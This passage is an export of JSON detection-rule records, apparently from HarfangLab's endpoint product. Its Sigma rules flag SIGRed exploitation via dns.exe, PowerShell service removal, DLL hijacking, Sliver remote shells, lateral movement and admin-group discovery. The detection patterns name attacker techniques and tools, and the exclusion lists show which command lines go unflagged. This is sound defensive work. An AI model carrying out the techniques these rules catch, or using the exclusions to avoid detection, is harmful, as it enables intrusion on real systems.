https://www.logpoint.com/fr/blog/serveurs-windows-dns-vulnerabilite-cve-2020-1350/\n - https://attack.mitre.org/techniques/T1210/\ndate: 2023/09/15\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - cve.2020-1350\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2020-1350\n - classification.Windows.Exploit.SIGRed\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\dns.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_conhost:\n Image:\n - '?:\\Windows\\System32\\conhost.exe'\n - '?:\\Windows\\SysWOW64\\conhost.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_dnscmd:\n Image:\n - '?:\\Windows\\System32\\dnscmd.exe'\n - '?:\\Windows\\SysWOW64\\dnscmd.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_dns:\n Image: 
'?:\\Windows\\System32\\dns.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7bedad5-e7a1-408b-aad1-6e5919a2de49",
"rule_name": "Abnormal Process Started by dns.exe",
"rule_description": "Detects the execution of an abnormal process by dns.exe.\nThis action can be indicative of the exploitation of CVE-2020-1350 (aka SIGRed), a vulnerability in Microsoft's Domain Name System (DNS) implementation on Windows Server versions from 2003 to 2019.\nTo exploit this vulnerability, an unauthenticated attacker needs to send malicious requests to a vulnerable Windows DNS server.\nIf successfully exploited, the vulnerability allows the attacker to run arbitrary code in the context of the Local System Account.\nIt is recommended to investigate the process tree for suspicious activities and to isolate the infected system if the exploitation is confirmed.\n",
"rule_creation_date": "2023-09-15",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1210"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7c122a5-c2d4-4d1c-bebb-b396e044254d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086472Z",
"creation_date": "2026-03-23T11:45:34.086474Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086479Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_remove_service.yml",
"content": "title: Service Removed via PowerShell\nid: d7c122a5-c2d4-4d1c-bebb-b396e044254d\ndescription: |\n Detects the Remove-Service PowerShell cmdlet being used.\n Attackers may use this cmdlet to remove specific services, such as security services.\n It is recommended to check if there is a legitimate reason for this service to be removed via PowerShell.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/10/15\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Remove-Service '\n\n # https://learn.microsoft.com/en-us/powershell/module/exchange/remove-serviceprincipal?view=exchange-ps\n exclusion_serviceprincipal:\n PowershellCommand|contains: 'Remove-ServicePrincipal'\n\n exclusion_exchange:\n ProcessInternalName:\n - 'ExSetupUI.exe'\n - 'ExSetup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_axiscommunication:\n PowershellScriptPath|startswith: '?:\\ProgramData\\Axis Communications\\'\n\n exclusion_scriptlaunchcache:\n PowershellScriptPath|startswith: '?:\\WINDOWS\\system32\\config\\systemprofile\\ScriptLaunchCache\\InstallAdminAgent.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7c122a5-c2d4-4d1c-bebb-b396e044254d",
"rule_name": "Service Removed via PowerShell",
"rule_description": "Detects the Remove-Service PowerShell cmdlet being used.\nAttackers may use this cmdlet to remove specific services, such as security services.\nIt is recommended to check if there is a legitimate reason for this service to be removed via PowerShell.\n",
"rule_creation_date": "2021-10-15",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7d8cd4e-04dc-40b3-a834-8d3f13d58867",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601335Z",
"creation_date": "2026-03-23T11:45:34.601339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601346Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_repair_bde.yml",
"content": "title: DLL Hijacking via repair-bde.exe\nid: d7d8cd4e-04dc-40b3-a834-8d3f13d58867\ndescription: |\n Detects potential Windows DLL Hijacking via repair-bde.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'repair-bde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\BDEREPAIR.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7d8cd4e-04dc-40b3-a834-8d3f13d58867",
"rule_name": "DLL Hijacking via repair-bde.exe",
"rule_description": "Detects potential Windows DLL Hijacking via repair-bde.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7e9b2bf-2f97-4449-a43f-9d5c5c07bbe0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608930Z",
"creation_date": "2026-03-23T11:45:34.608933Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608941Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BishopFox/sliver",
"https://github.com/BishopFox/sliver/blob/master/implant/sliver/shell/shell_windows.go",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_sliver_interactive_shell.yml",
"content": "title: Suspicious Sliver Interactive Shell Executed\nid: d7e9b2bf-2f97-4449-a43f-9d5c5c07bbe0\ndescription: |\n Detects the usage of the Sliver interactive shell.\n Sliver is an open source cross-platform adversary emulation/red team framework to perform security testing.\n It is recommended to analyze the parent process and the context of this action, with the help of the process tree as well as to correlate this alert with other malicious actions on the host.\nreferences:\n - https://github.com/BishopFox/sliver\n - https://github.com/BishopFox/sliver/blob/master/implant/sliver/shell/shell_windows.go\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/10/14\nmodified: 2022/10/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Sliver\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7e9b2bf-2f97-4449-a43f-9d5c5c07bbe0",
"rule_name": "Suspicious Sliver Interactive Shell Executed",
"rule_description": "Detects the usage of the Sliver interactive shell.\nSliver is an open source cross-platform adversary emulation/red team framework to perform security testing.\nIt is recommended to analyze the parent process and the context of this action, with the help of the process tree as well as to correlate this alert with other malicious actions on the host.\n",
"rule_creation_date": "2022-10-14",
"rule_modified_date": "2022-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d808495c-6318-462f-8fc6-c6e69c5e2c7f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090294Z",
"creation_date": "2026-03-23T11:45:34.090296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090300Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/006/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1021_006_powershell_invoke_command_remote.yml",
"content": "title: PowerShell Invoke-Command Executed on Remote Host\nid: d808495c-6318-462f-8fc6-c6e69c5e2c7f\ndescription: |\n Detects the execution of the Invoke-Command PowerShell cmdlet on remote host.\n Attackers can use this technique to execute remote commands on a target host, as part of lateral movement.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1021/006/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/11/07\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Invoke-Command -Comp'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_parentimage:\n ProcessParentImage: '?:\\Program Files\\Commvault\\ContentStore\\Base\\ADBackup.exe'\n\n exclusion_grandparentimage:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\CairnisAgent\\nvdkit.exe'\n\n exclusion_cairnis_agent:\n ProcessCommandLine|startswith: '?:/Windows/Sysnative/WindowsPowerShell/v1.0/PowerShell.exe -Executionpolicy remotesigned -File ?:/CairnisAgent/CAIDB/WS/CAIPWS_Command.ps1'\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d808495c-6318-462f-8fc6-c6e69c5e2c7f",
"rule_name": "PowerShell Invoke-Command Executed on Remote Host",
"rule_description": "Detects the execution of the Invoke-Command PowerShell cmdlet on a remote host.\nAttackers can use this technique to execute remote commands on a target host, as part of lateral movement.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d81c9136-0e88-4664-8b26-032b35d6e555",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604729Z",
"creation_date": "2026-03-23T11:45:34.604732Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604740Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/",
"https://nasbench.medium.com/a-deep-dive-into-windows-scheduled-tasks-and-the-processes-running-them-218d1eed4cce",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_suspicious_scheduled_task_launched.yml",
"content": "title: Suspicious Scheduled Task Launched\nid: d81c9136-0e88-4664-8b26-032b35d6e555\ndescription: |\n Detects the execution of suspicious processes spawned directly by a scheduled task, such as powershell.exe, cmd.exe, or unusual script interpreters.\n Attackers often use scheduled tasks to establish a persistent execution of malicious code.\n It is recommended to investigate the command-line and any potential scripts it launches (by creating a file download job) to determine its maliciousness.\nreferences:\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://nasbench.medium.com/a-deep-dive-into-windows-scheduled-tasks-and-the-processes-running-them-218d1eed4cce\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2022/10/20\nmodified: 2025/11/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentCommandLine|endswith:\n - '\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '\\taskeng.exe' # on older windows versions\n\n selection_process:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n - '\\mshta.exe'\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'pwsh.dll' # related to pwsh.exe (PowerShell 6)\n - 'wscript.exe'\n - 'cscript.exe'\n - 'RUNDLL32.EXE'\n - 'MSHTA.EXE'\n - 'pythonw.exe'\n - 'python.exe'\n\n selection_moderate_directory:\n CommandLine|contains:\n - ':\\Users\\\\*\\AppData\\'\n - ':\\Windows\\Temp\\'\n# - ':\\ProgramData\\' Too many False-Positives\n\n 
selection_suspicious_directory:\n CommandLine|contains:\n - ':\\PerfLogs\\'\n - ':\\Users\\\\*\\AppData\\Roaming\\'\n - ':\\Users\\\\*\\AppData\\LocalLow\\'\n - ':\\Users\\Default\\'\n - ':\\Users\\Public\\'\n\n exclusion_cmd:\n CommandLine: '?:\\WINDOWS\\system32\\cmd.EXE /C ?:\\ProgramData\\Microsoft Services BootXRay\\BxrR\\Resource\\Invoke-BxrR__PostBootActions1.bat 120 60'\n\n exclusion_powershell:\n CommandLine:\n - 'powershell.exe -Command ipmo PSWindowsUpdate; Install-WindowsUpdate -AcceptAll -ignoreReboot'\n - '?:\\Windows\\system32\\cmd.EXE /c powershell.exe -executionpolicy bypass -NoProfile -File ?:/windows/temp/winrm-elevated-shell-????????-????-????-????-????????????.ps1 > ?:\\Users\\\\*cyberwatch*\\AppData\\Local\\Temp\\tmp*.tmp 2>?:\\Users\\\\*cyberwatch*\\AppData\\Local\\Temp\\tmp*.tmp'\n - 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File ?:\\ProgramData\\Winget-AutoUpdate\\winget-upgrade.ps1'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe powershell -executionpolicy bypass -file ?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\data\\Maintenance.ps1'\n\n exclusion_cscript:\n CommandLine: '?:\\Windows\\system32\\cscript.exe /B /nologo ?:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog Server Manager Performance Monitor 604800000 ?:\\PerfLogs\\Admin\\ServerManager\\ $(Arg2)'\n\n exclusion_roaming:\n CommandLine|contains:\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressInvoice\\ExpressInvoice.exe -schedbackup'\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\Inventoria\\Inventoria.exe -schedbackup'\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe -downgrade'\n # '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\ExpressZip.exe -notifyinstalled'\n - '\\AppData\\Roaming\\NCH Software\\Program Files\\\\*\\\\*.exe -'\n - '\\AppData\\Roaming\\Real\\Update\\UpgradeHelper\\RealPlayer\\\\*\\agent\\rnupgagent.exe /'\n - 
'\\AppData\\Roaming\\Orange\\OrangeInside\\OrangeInside.exe'\n - '\\AppData\\Roaming\\NCH Software\\Program Files\\Pixillion\\pixillion.exe -downgrade'\n - '\\AppData\\Roaming\\Signiant\\SigniantApp.exe --checkRunning'\n - '\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe --action=UpdateSchedule'\n - '\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe --action=UpdateSchedule' # The two spaces are intentional\n - '\\AppData\\Roaming\\Zoom\\bin_??\\Zoom.exe --action=UpdateSchedule'\n\n exclusion_public:\n CommandLine:\n - '?:\\Users\\Public\\Documents\\Activer_framework_?_?.exe'\n - '?:\\Users\\Public\\Documents\\nettoyer_profil2.exe'\n - '?:\\Users\\Public\\Documents\\KIMO INSTRUMENTS\\\\*'\n - '?:\\Users\\Public\\TurboStnc\\TurboSyncService.exe -TASK RETOUR'\n\n exclusion_mylfp:\n CommandLine: '?:\\Windows\\System32\\wscript.exe ?:\\Users\\\\*\\AppData\\Roaming\\MyLFPAgent\\\\*\\MyLFPAgent.vbs'\n\n exclusion_watchdog:\n CommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\programdata\\cus\\watchdogreboot\\watchdogreboot.cmd'\n\n exclusion_microsoft_ep_man:\n CommandLine: 'powershell.exe -executionpolicy bypass -file ?:\\windows\\temp\\Install_Client_MECM.ps1'\n\n exclusion_turbosync:\n CommandLine|startswith: '?:\\users\\public\\turbosync\\turbosyncservice.exe'\n\n exclusion_cmd_common:\n CommandLine|startswith: 'cmd.exe /C START /MIN /D'\n\n condition: selection_parent and (selection_process and selection_moderate_directory or selection_suspicious_directory) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d81c9136-0e88-4664-8b26-032b35d6e555",
"rule_name": "Suspicious Scheduled Task Launched",
"rule_description": "Detects the execution of suspicious processes spawned directly by a scheduled task, such as powershell.exe, cmd.exe, or unusual script interpreters.\nAttackers often use scheduled tasks to establish a persistent execution of malicious code.\nIt is recommended to investigate the command-line and any potential scripts it launches (by creating a file download job) to determine its maliciousness.\n",
"rule_creation_date": "2022-10-20",
"rule_modified_date": "2025-11-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d8214e01-f0fd-4297-a2ee-d06835cdad6e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622732Z",
"creation_date": "2026-03-23T11:45:34.622734Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622738Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_001_net_localgroup_administrators.yml",
"content": "title: Administrators Group Content Discovered\nid: d8214e01-f0fd-4297-a2ee-d06835cdad6e\ndescription: |\n Detects execution of 'net localgroup administrators' or 'net group \"domain admins\" /domain'.\n These commands are often used by attackers to enumerate the contents of the local or domain administrators group as part of initial access or lateral movement within a network.\n It is recommended to investigate such activity, and correlate it with other discovery activity on the endpoint.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1069.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # net localgroup administrators\n # net group \"domain admins\" /domain\n selection_1:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_2:\n CommandLine|contains:\n - ' localgroup '\n - ' group '\n - ' groups '\n selection_3:\n # matches administrators, administrateurs, domain admin, ...\n CommandLine|contains: 'admin'\n\n # This is handled by other rules\n filter_command:\n CommandLine|contains:\n - '/add'\n - '/delete'\n - '/del'\n filter_admin:\n CommandLine|contains|all:\n - ' /dom'\n - ' admin'\n - ' domain'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_nexthink:\n GrandparentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentCommandLine|contains: '-NoProfile -NoLogo -NonInteractive -Sta -ExecutionPolicy Unrestricted -File ?:\\ProgramData\\Nexthink\\RemoteActions\\Scripts\\System\\{????????-????-????-????-????????????}.ps1 -Whitelist'\n\n exclusion_ancestors:\n 
ProcessAncestors|contains:\n - '|?:\\Program Files\\'\n - '|?:\\Program Files (x86)\\'\n - '|?:\\Windows\\SysWOW64\\cmd.exe|?:\\aigaclient\\aiga.exe|'\n - '|?:\\Windows\\SysWOW64\\cmd.exe|?:\\aigaserveur\\aiga.exe|'\n - '|?:\\Windows\\CCM\\CcmExec.exe|?:\\Windows\\System32\\services.exe|'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d8214e01-f0fd-4297-a2ee-d06835cdad6e",
"rule_name": "Administrators Group Content Discovered",
"rule_description": "Detects execution of 'net localgroup administrators' or 'net group \"domain admins\" /domain'.\nThese commands are often used by attackers to enumerate the contents of the local or domain administrators group as part of initial access or lateral movement within a network.\nIt is recommended to investigate such activity, and correlate it with other discovery activity on the endpoint.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.001",
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d84087b2-ec87-4a75-abe6-badf1ee886d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081335Z",
